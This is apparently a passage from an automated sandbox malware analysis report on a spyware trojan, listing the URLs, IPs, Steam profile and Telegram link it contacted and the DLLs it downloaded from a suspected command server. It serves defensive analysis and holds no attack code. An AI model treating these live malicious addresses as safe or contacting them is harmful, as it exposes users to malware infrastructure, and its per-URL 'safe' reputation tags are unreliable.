                      https://65.109.242.112/vcruntime140.dll0%Avira URL Cloudsafe
                      https://65.109.242.112/sqlx.dll0%Avira URL Cloudsafe
                      https://65.109.242.112/0%Avira URL Cloudsafe
                      https://65.109.242.112/softokn3.dll0%Avira URL Cloudsafe
                      https://65.109.242.112HJJ0%Avira URL Cloudsafe
                      https://65.109.242.112/mozglue.dll0%Avira URL Cloudsafe
                      https://65.109.242.112/mozglue.dlle0%Avira URL Cloudsafe
                      https://65.109.242.11212%VirustotalBrowse
                      https://65.109.242.112/12%VirustotalBrowse
                      https://65.109.242.112/p0%Avira URL Cloudsafe
                      https://65.109.242.112/nss3.dll0%Avira URL Cloudsafe
                      https://65.109.242.112JDG0%Avira URL Cloudsafe
                      https://65.109.242.112/#0%Avira URL Cloudsafe
                      https://65.109.242.112/sqlx.dll11%VirustotalBrowse
                      https://65.109.242.112/#12%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      steamcommunity.com
                      		23.195.238.96
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://65.109.242.112/msvcp140.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://65.109.242.112/freebl3.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://65.109.242.112/vcruntime140.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://65.109.242.112/sqlx.dllfalse
                        • 11%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://65.109.242.112/false
                        • 12%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://65.109.242.112/softokn3.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://65.109.242.112/mozglue.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://65.109.242.112/nss3.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/profiles/76561199681720597false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabEBAFBG.2.drfalse
                            		high
                            https://duckduckgo.com/ac/?q=EBAFBG.2.drfalse
                              		high
                              https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                		high
                                https://65.109.242.112/nss3.dllMsiRegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drfalse
                                  		high
                                  https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                    		high
                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                      		high
                                      https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=englRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                        		high
                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=ZQOnBoEsRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                          		high
                                          http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                            		high
                                            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                              		high
                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                		high
                                                https://65.109.242.112/softokn3.dllMRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                  		high
                                                  https://steamcommunity.com/profiles/76561199681720597GLRegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiGHCGDA.2.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=englishRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                      		high
                                                      https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                        		high
                                                        https://steamcommunity.com/profiles/76561199681720597/badgesRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                          		high
                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                            		high
                                                            https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=englishRegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                              		high
                                                              https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=enRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                		high
                                                                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                  		high
                                                                  https://t.me/talmatinfile.exe, 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drfalse
                                                                      		high
                                                                      http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000002.00000002.2178967195.000000006F90D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drfalse
                                                                        		high
                                                                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                          		high
                                                                          https://mozilla.org0/freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%2RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                              		high
                                                                              http://store.stRegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://steamcommunity.com/profiles/76561199681720597/inventory/RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                		high
                                                                                https://store.steampowered.com/points/shop/RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                  		high
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=EBAFBG.2.drfalse
                                                                                    		high
                                                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaRegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=qzBYRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                      		high
                                                                                      https://65.109.242.112/freebl3.dlloRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.ecosia.org/newtab/EBAFBG.2.drfalse
                                                                                          		high
                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAEHIEC.2.drfalse
                                                                                            		high
                                                                                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199681720597[1].htm.2.drfalse
                                                                                              		high
                                                                                              https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                		high
                                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                  		high
                                                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amRegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                    		high
                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119968172059776561199681720597[1].htm.2.drfalse
                                                                                                      		high
                                                                                                      https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                        		high
                                                                                                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishRegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                          		high
                                                                                                          https://65.109.242.11276561199681720597[1].htm.2.drfalse
                                                                                                          • 12%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                            		high
                                                                                                            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                              		high
                                                                                                              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                		high
                                                                                                                https://store.steampowered.com/about/76561199681720597[1].htm.2.drfalse
                                                                                                                  		high
                                                                                                                  https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                    		high
                                                                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFAEHIEC.2.drfalse
                                                                                                                      		high
                                                                                                                      https://steamcommunity.com/profiles/76561199681720597eLRegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://help.steampowered.com/en/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                          		high
                                                                                                                          https://steamcommunity.com/market/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                            		high
                                                                                                                            https://store.steampowered.com/news/RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                              		high
                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=EBAFBG.2.drfalse
                                                                                                                                		high
                                                                                                                                http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                    		high
                                                                                                                                    https://65.109.242.112HJJRegAsm.exe, 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		low
                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                      		high
                                                                                                                                      https://steamcommunity.com/discussions/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                        		high
                                                                                                                                        https://65.109.242.112/mozglue.dlleRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://store.steampowered.com/stats/RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                          		high
                                                                                                                                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                            		high
                                                                                                                                            https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                              		high
                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=yXrh2LzpDwct&l=eRegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                		high
                                                                                                                                                https://65.109.242.112/pRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchEBAFBG.2.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://steamcommunity.com/workshop/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.2175331068.000000001B68D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199681720597[1].htm.2.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoEBAFBG.2.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://65.109.242.112JDGRegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		low
                                                                                                                                                                  https://store.steampowered.com/76561199681720597[1].htm.2.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exeRegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://65.109.242.112/#RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • 12%, Virustotal, Browse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://ac.ecosia.org/autocomplete?q=EBAFBG.2.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=englishRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                                      		high

                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                      Public IPs

                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      23.195.238.96
                                                                                                                                                                                      		steamcommunity.comUnited States
                                                                                                                                                                                      		16625AKAMAI-ASUSfalse
                                                                                                                                                                                      65.109.242.112
                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                      		11022ALABANZA-BALTUSfalse

                                                                                                                                                                                      General Information

                                                                                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                      Analysis ID:1440170
                                                                                                                                                                                      Start date and time:2024-05-12 12:46:06 +02:00
                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 6m 6s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                      Number of analysed new started processes analysed:9
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Sample name:file.exe
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@9/25@1/2
                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                      • Successful, ratio: 97%
                                                                                                                                                                                      • Number of executed functions: 92
                                                                                                                                                                                      • Number of non-executed functions: 201
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                      • Stop behavior analysis, all processes terminated

                                                                                                                                                                                      Warnings

                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                      Simulations

                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                      TimeTypeDescription
